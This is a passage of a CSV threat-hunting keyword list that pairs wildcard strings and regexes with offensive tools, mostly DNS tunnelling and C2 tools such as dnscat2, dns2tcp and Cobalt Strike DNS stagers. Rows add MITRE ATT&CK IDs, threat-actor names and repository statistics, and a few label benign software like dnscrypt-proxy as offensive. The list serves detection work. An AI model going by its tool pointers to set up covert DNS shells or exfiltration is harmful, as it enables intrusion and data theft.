T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*dns_redir.sh *",".{0,1000}dns_redir\.sh\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*dns_server.py -d *",".{0,1000}dns_server\.py\s\-d\s.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","0","N/A","10","10","104","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z" "*dns_spoof.*",".{0,1000}dns_spoof\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*dns_stager_prepend*",".{0,1000}dns_stager_prepend.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*dns_stager_prepend*",".{0,1000}dns_stager_prepend.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*'dns_stager_prepend'*",".{0,1000}\'dns_stager_prepend\'.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*dns_stager_subhost*",".{0,1000}dns_stager_subhost.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*dns_stager_subhost*",".{0,1000}dns_stager_subhost.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*'dns_stager_subhost'*",".{0,1000}\'dns_stager_subhost\'.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*DNS_TXT_Pwnage.ps1*",".{0,1000}DNS_TXT_Pwnage\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*dns2tcp-*.zip*",".{0,1000}dns2tcp\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","1","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*dns2tcp.exe*",".{0,1000}dns2tcp\.exe.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","1","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*dns2tcp.hsc.fr*",".{0,1000}dns2tcp\.hsc\.fr.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","1","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*dns2tcp.kali.org*",".{0,1000}dns2tcp\.kali\.org.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","1","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*dns2tcp.pid*",".{0,1000}dns2tcp\.pid.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*dns2tcpc -z *",".{0,1000}dns2tcpc\s\-z\s.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*dns2tcpc.exe*",".{0,1000}dns2tcpc\.exe.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","1","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*dns2tcpd --*",".{0,1000}dns2tcpd\s\-\-.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*dns2tcpd -f *",".{0,1000}dns2tcpd\s\-f\s.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*dns2tcp-master*",".{0,1000}dns2tcp\-master.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","1","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*dnsadmin_serverlevelplugindll.*",".{0,1000}dnsadmin_serverlevelplugindll\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*DNSAES256Handler.*",".{0,1000}DNSAES256Handler\..{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*dns-beacon *",".{0,1000}dns\-beacon\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*dns-black-cat-main*",".{0,1000}dns\-black\-cat\-main.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","1","N/A","10","10","104","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z" "*DNS-C2 #>*",".{0,1000}DNS\-C2\s\#\>.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*dnscan-master*",".{0,1000}dnscan\-master.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","6","10","1076","410","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*dnscat -*",".{0,1000}dnscat\s\-.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","0","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*dnscat tcpcat*",".{0,1000}dnscat\stcpcat.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","0","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*dnscat*",".{0,1000}dnscat.{0,1000}","offensive_tool_keyword","dnscat","Welcome to dnscat2. a DNS tunnel that WON'T make you sick and kill you This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol. which is an effective tunnel out of almost every network.","T1071 - T1090 - T1571","TA0011","N/A","N/A","Data Exfiltration","https://github.com/iagox86/dnscat2","1","0","N/A","N/A","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*dns-cat.exe -*",".{0,1000}dns\-cat\.exe\s\-.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","0","N/A","10","10","104","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z" "*dnscat2*.tar.bz2*",".{0,1000}dnscat2.{0,1000}\.tar\.bz2.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*dnscat2-*.zip*",".{0,1000}dnscat2\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*dnscat2.*",".{0,1000}dnscat2\..{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*dnscat2.ps1*",".{0,1000}dnscat2\.ps1.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*dnscat2/*",".{0,1000}dnscat2\/.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*dnscat2-server*",".{0,1000}dnscat2\-server.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*dnscat2-win32.exe*",".{0,1000}dnscat2\-win32\.exe.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*dnschef --fakeip 127.0.0.1 -q*",".{0,1000}dnschef\s\-\-fakeip\s127\.0\.0\.1\s\-q.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*dnschef.exe *",".{0,1000}dnschef\.exe\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*dnschef.logger*",".{0,1000}dnschef\.logger.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*dnschef.py *",".{0,1000}dnschef\.py\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*dnschef.utils*",".{0,1000}dnschef\.utils.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*dnschef-ng-main*",".{0,1000}dnschef\-ng\-main.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*DNSCrypt client proxy*",".{0,1000}DNSCrypt\sclient\sproxy.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*DNSCrypt/dnscrypt-proxy*",".{0,1000}DNSCrypt\/dnscrypt\-proxy.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-autoinstall*",".{0,1000}dnscrypt\-autoinstall.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy -resolve*",".{0,1000}dnscrypt\-proxy\s\-resolve.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized 